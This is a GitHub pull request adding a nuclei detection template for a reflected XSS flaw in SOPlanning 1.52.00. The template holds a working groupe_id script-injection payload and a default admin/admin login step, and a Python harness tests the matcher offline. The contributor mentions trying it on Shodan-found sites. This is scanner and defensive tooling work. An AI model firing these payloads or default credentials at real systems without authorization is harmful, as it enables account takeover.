
add soplanning xss #9700

Merged
merged 6 commits into from May 8, 2024

Conversation

Kazgangap
Contributor

Template / PR Information

add soplanning 1.52.00 xss vuln

https://packetstormsecurity.com/files/178434/SOPlanning-1.52.00-Cross-Site-Scripting.html

SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameter. A remote unauthenticated attacker can hijack the admin account or other users. The remote attacker can hijack a user's session or credentials and perform a takeover of the entire platform.

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

@DhiyaneshGeek
Member

Hi @Kazgangap, the matcher looks weak. Is it possible to update the matcher?

Thanks

@Kazgangap
Contributor Author

> Hi @Kazgangap, the matcher looks weak. Is it possible to update the matcher?
>
> Thanks

hi @DhiyaneshGeek
I tested it on certain sites with Shodan. I think I overlooked that auth is a vulnerability. So I would be glad if you also examine it; we can close the PR accordingly.

@DhiyaneshGeek
Member

Hi @Kazgangap, yeah, it looks like authentication is involved. If you can update the template with a login request and add an additional matcher, it will be great.

Thanks

@Kazgangap
Contributor Author

Kazgangap commented May 7, 2024

Hello again @DhiyaneshGeek
As you said, I added a login section and set admin admin by default. Then the PoC is applied. I have seen such accounts on Shodan. I tested it on the demo site and it works. You can test it yourself. Link: https://demo.soplanning.org
Also, the person who found this vulnerability has applied for a CVE, and you can change the name if you want. I guess the CVE number has not been approved yet. CVE-2024-33724. PoC link: https://github.com/fuzzlove/soplanning-1.52-exploits

```yaml
id: soplanning-xss

info:
  name: SOPlanning 1.52.00 Cross Site Scripting
  author: Kazgangap
  severity: high
  description: |
    SOPlanning v1.52.00 is vulnerable to reflected cross-site scripting (XSS) via the 'groupe_id' parameter. A remote unauthenticated attacker can inject JavaScript code leading to session hijacking or account takeover.
  reference:
    - https://packetstormsecurity.com/files/178434/SOPlanning-1.52.00-Cross-Site-Scripting.html
  metadata:
    vendor: soplanning
    product: soplanning
    shodan-query: html:"soplanning"
  tags: packetstorm,xss,soplanning

http:
  - raw:
      # Request 1: authenticate; the session cookie set here is reused by the engine for request 2
      - |-
        POST /process/login.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate, br
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 26
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: same-origin
        Sec-Fetch-User: ?1
        Te: trailers
        Connection: close

        login={{username}}&password={{password}}

      # Request 2: groupe_id is reflected unencoded; the value closes the attribute it lands in
      # and comments out the remainder of the markup
      - |+
        GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate, br
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Te: trailers
        Connection: close

    # default credentials used for the login step; pitchfork pairs username[i] with password[i]
    payloads:
      username:
        - admin
      password:
        - admin
    attack: pitchfork

    redirects: true
    # both matchers must hold: the unencoded payload is present in the body AND the page returned 200
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<script>alert(document.domain)</script>"
        part: body
      - type: status
        status:
          - 200
```

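As an added illustration (my own code, not part of the PR or the nuclei template), a small Python harness that replays the template's matcher logic against constructed responses: it shows that the word-plus-status combination accepts an unencoded reflection, rejects the output-encoded fix and the login wall, and, as a caveat, still fires when the marker is echoed inside JSON, which a content-type check (an assumption, not a matcher the template has) filters out.

```python
"""Offline check of the matcher logic in the SOPlanning XSS template above.

All responses are constructed here; nothing is sent to any host."""
import html
import json
from dataclasses import dataclass

# The marker the template's `words` matcher looks for in the response body.
MARKER = "<script>alert(document.domain)</script>"
# The groupe_id value the template sends, URL-decoded.
GROUPE_ID = '"><script>alert(document.domain)</script><!--'


@dataclass
class Response:
    status: int
    content_type: str
    body: str


def template_matches(resp: Response) -> bool:
    """Replicates the template: matchers-condition `and`, word matcher on the body, status 200."""
    return MARKER in resp.body and resp.status == 200


def strict_matches(resp: Response) -> bool:
    """Stricter variant (assumption, not in the template): also requires an HTML content type,
    since a marker echoed in JSON or plain text is not rendered as markup by a browser."""
    return template_matches(resp) and resp.content_type.lower().startswith("text/html")


def hidden_input(value: str) -> str:
    """Constructed stand-in for a form field that groupe_save.php might echo the parameter into."""
    return f'<input type="hidden" name="groupe_id" value="{value}">'


# 1. Unencoded reflection into an attribute: `">` closes attribute and tag, `<!--` hides the rest.
VULNERABLE = Response(200, "text/html; charset=utf-8", hidden_input(GROUPE_ID))
# 2. The same page after output encoding (htmlspecialchars with ENT_QUOTES in PHP terms).
FIXED = Response(200, "text/html; charset=utf-8", hidden_input(html.escape(GROUPE_ID, quote=True)))
# 3. An API-style endpoint that echoes the parameter inside a JSON document.
JSON_ECHO = Response(200, "application/json", json.dumps({"saved": 1, "groupe_id": GROUPE_ID}))
# 4. No session: the followed redirect lands on the login form and nothing is reflected.
LOGIN_WALL = Response(200, "text/html", '<form method="post" action="/process/login.php"></form>')


def evaluate() -> dict:
    """Returns {case: (template_result, strict_result)} for the four constructed responses."""
    cases = {"vulnerable": VULNERABLE, "fixed": FIXED, "json_echo": JSON_ECHO, "login_wall": LOGIN_WALL}
    return {name: (template_matches(r), strict_matches(r)) for name, r in cases.items()}


if __name__ == "__main__":
    for name, (weak, strict) in evaluate().items():
        print(f"{name:11} template={weak!s:5} strict={strict}")
```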

@DhiyaneshGeek
Member

Hi @Kazgangap

Thank you so much for sharing the updated template.

Can you raise a new PR for a default-login template for SOPlanning? That will be a great addition.

😄

@DhiyaneshGeek DhiyaneshGeek added Status: In Progress This issue is being worked on, and has someone assigned. and removed waiting for more info labels May 7, 2024
@DhiyaneshGeek DhiyaneshGeek added Done Ready to merge and removed Status: In Progress This issue is being worked on, and has someone assigned. labels May 7, 2024
@pussycat0x pussycat0x merged commit 28ae879 into projectdiscovery:main May 8, 2024
2 checks passed